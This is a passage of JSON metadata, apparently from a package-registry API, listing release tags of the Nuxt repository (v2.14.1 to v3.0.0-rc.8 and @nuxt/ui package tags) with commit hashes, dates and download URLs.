r.gz/@nuxt/ui-templates@0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.2/manifests"},{"name":"v3.0.0-rc.8","sha":"3960f513c377e1ef5d47986a13c1c66c1eaa1afc","kind":"commit","published_at":"2022-08-12T13:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8/manifests"},{"name":"@nuxt/ui-templates@0.3.1","sha":"4a9060d9cc44e23bc833dfb7ab652fc687fba390","kind":"tag","published_at":"2022-08-11T21:17:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.1/manifests"},{"name":"@nuxt/ui@0.3.1","sha":"4a9060d9cc44e23bc833dfb7ab652fc687fba390","kind":"tag","published_at":"2022-08-11T21:17:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.1/manifests"},{"name":"v3.0.0-rc.7","sha":"5ea0474225c3591cd743f51a72aa2cd7597ec0e4","kind":"commit","published_at":"2022-08-11T10:40:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7/manifests"},{"name":"@nuxt/ui-templates@0.3.0","sha":"3623350feeb4b0ba4906611071430c7577440a75","kind":"tag","published_at":"2022-07-21T12:41:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.0/manifests"},{"name":"@nuxt/ui-templates@0.2.2","sha":"b6969f5639cb3f4cb343de99b815526cac04f99b","kind":"tag","published_at":"2022-07-21T12:36:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.2/manifests"},{"name":"@nuxt/ui@0.3.0","sha":"b6969f5639cb3f4cb343de99b815526cac04f99b","kind":"tag","published_at":"2022-07-21T12:36:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.0/manifests"},{"name":"v3.0.0-rc.6","sha":"88f4525a4fa7dc1595e85b0cfffdd441aa6970ed","kind":"commit","published_at":"2022-07-18T10:06:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6/manifests"},{"name":"v3.0.0-rc.5","sha":"65e6b1439e14a196d8b15db51939c65d934532e7","kind":"commit","published_at":"2022-07-13T15:40:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5/manifests"},{"name":"@nuxt/ui-templates@0.2.1","sha":"1e0e83e29ac3633e299b9261c64122b360216200","kind":"tag","published_at":"2022-07-12T14:12:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.1/manifests"},{"name":"@nuxt/ui-templates@0.2.0","sha":"54dc4c8502804409a8248409cde027cf77ddc39c","kind":"tag","published_at":"2022-07-12T13:57:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.0/manifests"},{"name":"@nuxt/ui@0.2.0","sha":"54dc4c8502804409a8248409cde027cf77ddc39c","kind":"tag","published_at":"2022-07-12T13:57:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.2.0/manifests"},{"name":"v3.0.0-rc.4","sha":"be0e502a05a9c8bb2eeaa62459d611f6363be89f","kind":"commit","published_at":"2022-06-13T14:27:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4/manifests"},{"name":"v3.0.0-rc.3","sha":"36512d0eaaa32e0dd1d0887098fcf842a7fa66b1","kind":"commit","published_at":"2022-05-10T08:58:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3/manifests"},{"name":"@nuxt/ui-templates@0.1.1","sha":"2ea0ad23512a0ce341092dd08162503d94b8eef9","kind":"tag","published_at":"2022-05-07T18:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.1/manifests"},{"name":"v3.0.0-rc.2","sha":"a8d42d586f84b7cef66c7bf8b76eb560139e6f88","kind":"commit","published_at":"2022-05-02T20:47:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2/manifests"},{"name":"@nuxt/ui@0.1.1","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-05-02T09:31:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.1/manifests"},{"name":"v3.0.0-rc.1","sha":"0c2f07695702df33a63b88322d93d6815a227a0f","kind":"commit","published_at":"2022-04-20T21:09:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1/manifests"},{"name":"@nuxt/ui-templates@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.0/manifests"},{"name":"@nuxt/ui-assets@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.1.0/manifests"},{"name":"@nuxt/ui@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.0/manifests"},{"name":"v2.15.8","sha":"d4b9e4b0553bcd617ecbc0b8b76871070b347fcb","kind":"tag","published_at":"2021-08-11T21:10:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8/manifests"},{"name":"v2.15.7","sha":"4f370e2043b7731db0e8ef65a4f88431cd8795f3","kind":"tag","published_at":"2021-06-14T13:59:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7/manifests"},{"name":"v2.15.6","sha":"0eae970e74f1fbf29f400a3178f54061a79bfac2","kind":"tag","published_at":"2021-05-12T10:47:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6/manifests"},{"name":"v2.15.5","sha":"0460a278ab5258f0cd6d3fe8fc014f892b2bdaf6","kind":"tag","published_at":"2021-05-09T08:17:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5/manifests"},{"name":"v2.15.4","sha":"b39dcda6adf21e4eb82caef7895440755c6d96fc","kind":"tag","published_at":"2021-04-01T11:23:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4/manifests"},{"name":"v2.15.3","sha":"24a0c7e27123874f9545c46852b2e7d34920b017","kind":"tag","published_at":"2021-03-10T12:25:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3/manifests"},{"name":"v2.15.2","sha":"b7f9cdc2a44dbf25b1bd1845fdc8ebb65b0f0754","kind":"tag","published_at":"2021-02-23T09:20:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2/manifests"},{"name":"v2.15.1","sha":"95daddf43c3b9e9474870631727755ecd2e94319","kind":"tag","published_at":"2021-02-19T16:39:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1/manifests"},{"name":"v2.15.0","sha":"dcfb42b77221f559e7ccb09edd5c2a2004c5bc6b","kind":"tag","published_at":"2021-02-15T11:06:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0/manifests"},{"name":"v2.14.12","sha":"bde4c5f6b0e643716d97027cdd185891ada02f7f","kind":"tag","published_at":"2020-12-16T13:15:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12/manifests"},{"name":"v2.14.11","sha":"d85f4b92642f4668463deb286524d424e57a1f62","kind":"tag","published_at":"2020-12-09T23:21:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11/manifests"},{"name":"v2.14.10","sha":"e97051adfafb9517cabbfd9b87a02e8c37ce949e","kind":"tag","published_at":"2020-12-07T10:30:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10/manifests"},{"name":"v2.14.9","sha":"e9f380c9e6b729ab77b38babba6ad15e95b4efa8","kind":"tag","published_at":"2020-12-02T10:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9/manifests"},{"name":"v2.14.8","sha":"68d8fb84872b807b2149756bb97a84961854a2c3","kind":"tag","published_at":"2020-12-01T11:06:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8/manifests"},{"name":"v2.14.7","sha":"265d0e7aac3df9f83f323c4d2dba11434956fe9b","kind":"tag","published_at":"2020-10-15T16:29:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7/manifests"},{"name":"v2.14.6","sha":"41176577ad71a8b91a91ca8f458fd64a278dd88d","kind":"tag","published_at":"2020-09-21T10:46:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6/manifests"},{"name":"v2.14.5","sha":"3b037720f2edc3e351d200bbb8525df1e93d7aad","kind":"tag","published_at":"2020-09-10T12:36:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5/manifests"},{"name":"v2.14.4","sha":"1a77fba4eb247faa3f1c8ec0fa49ce372abeb1d8","kind":"tag","published_at":"2020-08-27T10:26:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4/manifests"},{"name":"v2.14.3","sha":"5e9d759d7bee6a3d32e16ef05eef988e882c600a","kind":"tag","published_at":"2020-08-16T17:04:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3/manifests"},{"name":"v2.14.2","sha":"34c56722c8c97c0c6a59ecfbc5836c38047e4572","kind":"tag","published_at":"2020-08-16T10:59:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2/manifests"},{"name":"v2.14.1","sha":"c30499d7e02cd6d8b51d97ee7d7a537d8a59f63b","kind":"tag","published_at":"2020-08-04T16:37:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1/manifests"